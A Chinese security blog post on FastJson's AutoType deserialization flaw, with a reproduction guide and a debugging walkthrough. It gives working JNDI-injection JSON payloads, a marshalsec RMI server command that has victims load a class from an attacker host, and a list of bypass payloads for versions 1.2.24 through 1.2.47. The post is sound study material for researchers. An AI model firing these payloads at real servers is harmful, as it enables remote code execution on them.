FastJson-安全

已于 2022-10-07 11:49:33 修改
阅读量4.2k 收藏 1
点赞数
分类专栏: Web安全 文章标签: java json 安全
于 2022-01-03 21:28:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlsj228/article/details/122292956
版权
本文详细介绍了FastJson的AutoType特性及其在版本1.2.24及以前存在的安全问题。攻击者可以利用AutoType功能构造恶意JSON字符串,触发JNDI注入攻击。通过启动RMI服务器并指定远程类加载,可能导致代码执行。FastJson在后续版本中对此进行了修复,但攻击者不断寻找新的绕过方式。文章还展示了漏洞利用的调用栈,并提供了不同版本的exploit示例。
摘要由CSDN通过智能技术生成

1 FastJson介绍

FastJson的主要功能就是将Java对象序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。把一个Java对象转换成字符串,有两种选择:

1)基于属性

fastjson引入了AutoType,即在序列化的时候使用@type字段,标注了类对应的原始类型,方便在反序列化的时候定位到具体类型。

2)基于setter/getter

当我们要对他进行序列化的时候,fastjson会扫描其中的getter方法,即找到getName和getFruit,这时候就会将name和fruit两个字段的值序列化到JSON字符串中。

2 fastjson<=1.2.24

2.1 介绍

fastjson(v1.2.25 之前)的AutoType是默认开启的,也没有什么限制。 可以利用autoType这个特性,自己构造一个JSON字符串,并且使用@type指定一个自己想要使用的攻击类库。

比如利用com.sun.rowset.JdbcRowSetImpl这个类的dataSourceName传入一个rmi的源。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:port/Exploit","autoCommit":true}

JdbcRowSetImpl类的基本原理见:JNDI注入

2.2 复现方式

首先创建一个远程加载的类

 启动web服务

这样访问http://IP1:3333/MyTest.class就可以访问到class文件。 然后我们借助marshalsec启动一个RMI服务器,监听9999端口,并制定加载远程类MyTest.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://IP1:3333/#MyTest" 9999 (注意IP保密)

最后传入:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://IP2:9999/MyTest","autoCommit":true}

2.3 FastJson调用栈

详见流程见fastjson=1.2.24调试。

Exploit小结:

来源于  https://github.com/shengqi158/fastjson-remote-code-execute-poc

1.2.24
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}

未知版本(1.2.24-41之间)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.41
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};

1.2.43
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}

1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}

1.2.47
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}

3 fastjson=1.2.24调试

1)class JSON类

pasre(String text)如下

2)class DefaultJSONParser类

当为{时,token=12

token=12,继续parseObject

来到parseObject(Map object, Object fieldName)

这里有一个 JSONLexerBase.scanSymbol,作用是找一对“”之间的内容

第一对“”里就是“@value”,判断key = @type继续走

3)class TypeUtils类

4)class DefaultJSONParser类

5)class ParserConfig类

6)返回之后继续来到class DefaultJSONParser,执行deserializer.deserialze(this, clazz, fieldName);

然后来到class JavaBeanDeserializer

7)继续往下走,来到 class JSONScanner

8) JavaBeanDeserializer类

9)FieldDeserializer类

反射调用

后面就是JdbcRowSetImpl正常流程了,见JNDI注入

凌木LSJ
关注
专栏目录
fastjson-1.2.66版 2020年最新发布,继续加固安全
03-13
fastjson 1.2.66 已发布,这又是一个维护版本,修复了一些 BUG,并且做安全加固,补充了 AutoType 黑名单。 Issues 修复某些场景下BeanToArray报错的问题 修复某些场景多版本共存导致的的兼容问题 修复JSONArray构造方法中,由null List会引发的NPE问题 修复大对象某些场景会报错的问题 #2779 修复字符串自动转换为数值时,小数点后全零报错的问题 #2838 修复某些场景下不识别Kotlin泛型的问题 修复开始SupportNonPublicField特性后JSONField配置name不支持private字段的问题 #2866 修复纳秒级 Timestamp 解析异常问题 #2894 日期自动识别增强对纳秒时间的支持的 支持对Queue类型的反序列化 修复JSONField 在LocalDateTime类型时 format 不生效问题 修复JSONValidator有些场景不能识别非法JSON数据的问题 #3017 加强安全防护
fastjson-1.2.9.jar.zip
12-23
5. **安全增强**: 针对 JSON 注入等安全问题,Fastjson 提供了安全模式,可以防止恶意数据注入。 综上所述,Fastjson 是一个强大且易用的 JSON 解析工具,广泛应用于各种 Java 项目中。其高效的性能、丰富的功能...
安全版本fastjson
karlif的博客
10-27 989
记录一下安全版本fastjson
序列化方式二——JSONFastjson
最新发布
zhouhengzhe的博客
09-20 1646
允许用户自定义序列化器,用于控制特定类型的序列化过程。用户需要实现接口,并重写write方法。@Data// 构造方法、getter和setter省略@Override// 自定义序列化逻辑// 输出自定义序列化后的结果专门用于处理将 JSON 数据反序列化为 Java 对象的过程。不过,需要注意的是,对于大多数开发者而言,直接使用进行自定义反序列化可能不是最常见的做法,因为 Fastjson 提供了更高级别的抽象(如@JSONField注解、Feature。
推荐项目:Fastjson-Blacklist - 安全增强版Fastjson
gitblog_00042的博客
04-25 380
推荐项目:Fastjson-Blacklist - 安全增强版Fastjson 去发现同类优质开源项目:https://gitcode.com/ 是一个基于阿里巴巴开源的 Fastjson安全增强版本,旨在为开发者提供更安全、可控的数据序列化与反序列化体验。Fastjson是一个Java语言编写的高性能功能完备的JSON库,而Fastjson-Blacklist则在此基础上添加了针对某些已知漏...
Fastjson开启安全模式5种方法(VIP典藏版)
热门推荐
慕白Lee的博客
06-08 1万+
一、Fastjson漏洞事件始末 1、AutoType 2、AutoType是谁-为啥使用-为啥出错 3、目前已升级至1.2.83 二、打开SafeMode功能 1. 在代码中配置 2. 加上JVM启动参数 3. 通过fastjson.properties文件配置。 4. safeMode场景如何做autoType 5. 怎么判断是否用到了autoType 6. 使用JSONType.autoTypeCheckHandler......
2024年Fastjson开启安全模式5种方法(VIP典藏版)(1),2024年最新网络安全开发热门前沿知识
05-10 1499
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
fastjson-1.2.83 针对近期阿里fastjson包漏洞,升级解决
05-24
Fastjson 1.2.80 及之前版本使用黑白名单用于防御反序列化漏洞,经研究该防御策略在特定条件下可绕过默认 autoType 关闭限制,攻击远程服务器,风险影响较大。建议 Fastjson 用户尽快采取安全措施保障系统安全
fastjson-1.2.66_fastjson-1.2.66.jar_Fastjson_
09-30
《深入解析Fastjson 1.2.66版本Fastjson是阿里巴巴开源的一个高性能的JSON库,它在Java世界中被广泛使用,为开发者提供了快速、方便地处理JSON数据的能力。Fastjson 1.2.66是该库的一个稳定版本,其核心功能包括...
版本fastjson-1.2.71解决安全漏洞.rar
04-14
然而,随着广泛使用,Fastjson在早期版本中出现了一些安全漏洞,这些漏洞可能导致远程代码执行(RCE)和其他安全风险。在标题提到的“高版本fastjson-1.2.71解决安全漏洞”中,我们主要关注的是Fastjson如何通过...
最新版 fastjson-1.2.68.jar
04-16
总的来说,Fastjson-1.2.68.jar作为最新版本,不仅继承了Fastjson一贯的高性能和易用性,还针对安全性和兼容性进行了优化。对于Java开发者来说,它是一个值得信赖的JSON处理工具,无论是在日常开发还是在处理大数据...
安全模式
03-29
NULL 博文链接:https://buptrock.iteye.com/blog/1279528
各个版本fastJson_jar包最新版
10-17
各个版本fastJson_jar包最新版,方便各位学习,交流互用
fastjson 各个 版本 jar
03-25
fastjson-1.1.35.jar ,fastjson-1.1.36.jar ,fastjson-1.1.37.jar ,fastjson-1.1.44.jar ,fastjson-1.2.3.jar,fastjson-1.2.4.jar
Fastjson1.2.47以及之前的所有版本
10-26
Fastjson1.2.47以及之前的所有版本
fastjson开启安全模式
wenlai123456的博客
09-03 3464
方式4:通过fastjson.properties文件配置。方式2:针对某个解析配置。方式3:JVM启动参数。
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 3708
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
FastJson安全模式,开启后关闭类型隐式传递
m0_63159822的博客
01-19 1400
但是,FastJson 在解析 JSON 字符串时存在一定的安全风险,如果输入的 JSON 字符串中包含恶意代码,就有可能导致系统被攻击。为了解决这个问题,FastJson 提供了一种安全模式(safe mode),可以在解析 JSON 字符串时检测其中是否包含恶意代码,从而防止系统被攻击。在安全模式下,FastJson 会严格限制 JSON 字符串的内容,只允许简单的 JSON 格式。这样,当使用 FastJson 解析 JSON 字符串时,就会自动启用安全模式,从而提高系统的安全性。
Fastjson 1.2.66 版本发布,继续加固安全
程序猿DD
03-04 2328
点击上方蓝色“程序猿DD”,选择“设为星标”回复“资源”获取独家整理的学习资料!来源 |https://www.oschina.net/news/113770/fastjson-1-2...
fastjson-1.2.47下载
07-03
请注意,在任何时候下载软件时,要确保从可信的来源下载软件,并在安装之前使用杀毒软件进行扫描,以确保安全性。 ### 回答2: fastjson-1.2.47是一个用于Java编程语言的JSONJavaScript Object Notation)解析器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值